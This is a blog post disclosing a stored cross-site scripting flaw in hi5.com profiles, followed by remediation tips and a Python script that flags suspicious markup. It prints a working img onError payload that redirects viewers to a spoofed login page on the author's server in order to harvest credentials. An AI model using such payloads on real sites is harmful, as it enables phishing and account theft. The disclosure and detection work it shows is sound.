Hi5 and XSS Part II 
Well, I've just written a proof of concept on my hi5.com profile. You need a valid login! While loading my profile, you'll auto-magically be redirected to a spoofed hi5.com page on my webserver. I won't save the information you input, but I suggest you enter only test info to try it out!
For those interested, the proof of concept is the following:
<img src="" onError="location.replace('http://pabrantes.dyndns.org/www.hi5.com/friend/displayMyProfile.html');">
Since no image will be loaded, an onError event will be generated, and the user will automatically be asked to log in again, but on the fake page! Since it's not unusual to be asked to log in again at hi5.com, there's a potential danger of users disclosing their information!
I've sent you an email. But since people can find this post, I'll reply here also.
The attack I've described was an XSS (cross-site scripting) attack that you would deploy on your page and that would affect others who look at your profile. Having your profile changed due to seeing someone's profile is a bit more extreme, because it would have to do the following:
- identify your user; well, that might not be difficult
- be able to submit some code of their own as you; this can be a problem, since the submissions aren't stored in the URL but in the HTTP header.
Although I'm not saying it's not possible, I'm gonna look into it a bit. Or it could be another totally different problem.
But if it somehow was a script injection on your page, here are the tips to see if you can get your profile back:
- go to your web browser's preferences and disable JavaScript
- enter your hi5 profile
- select My profile and then edit
- Check the fields that support HTML and look for strange things you haven't written there.
Also, if you find anything, please copy/paste it and send it back via email or post it here. I would be interested in seeing that.
Best regards,
Paulo Abrantes
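The manual check in the reply above (reading through the HTML-capable profile fields for markup you did not write) can be scripted once the field contents are copied out. This is an added example, not code from the original post or from hi5: the field names, the sample values and the lists of suspicious tags and attributes are assumptions made for illustration.

```python
from html.parser import HTMLParser

# Assumed review lists: attributes that carry a URL, and tags that embed active content.
URL_ATTRS = {"src", "href", "action", "formaction", "data", "background"}
ACTIVE_TAGS = {"script", "iframe", "object", "embed", "meta", "base", "form"}
SCRIPT_SCHEMES = {"javascript", "vbscript", "data"}


class ProfileAuditor(HTMLParser):
    """Collects (reason, tag, attribute, value) findings for one HTML field."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names, so onError == onerror.
        if tag in ACTIVE_TAGS:
            self.findings.append(("active-element", tag, "", ""))
        for name, value in attrs:
            value = (value or "").strip()
            if name.startswith("on"):
                # Inline event handlers run script in the viewer's session.
                self.findings.append(("event-handler", tag, name, value))
            elif name in URL_ATTRS:
                # Browsers drop tabs/newlines inside a scheme, so compare without them.
                cleaned = "".join(c for c in value if c > " ")
                scheme = cleaned.split(":", 1)[0].lower() if ":" in cleaned else ""
                if scheme in SCRIPT_SCHEMES:
                    self.findings.append(("script-url", tag, name, value))


def audit_profile(fields):
    """Return {field_name: findings} for every field with suspicious markup."""
    report = {}
    for field, html in fields.items():
        auditor = ProfileAuditor()
        auditor.feed(html)
        auditor.close()
        if auditor.findings:
            report[field] = auditor.findings
    return report


# Constructed sample fields; the first has the shape of the proof of concept above.
SAMPLE_FIELDS = {
    "about_me": "<b>Hi</b><img src=\"\" onError=\"location.replace('https://example.invalid/');\">",
    "interests": "<a href=\"java\tscript:void(0)\">music</a>",
    "favorite_music": "<i>Fado</i> and <a href='https://example.org/'>a link</a>",
}

if __name__ == "__main__":
    for field, findings in audit_profile(SAMPLE_FIELDS).items():
        print(field, findings)
```

A clean report only means none of the listed patterns were found; anything flagged should be removed from the field with JavaScript still disabled in the browser.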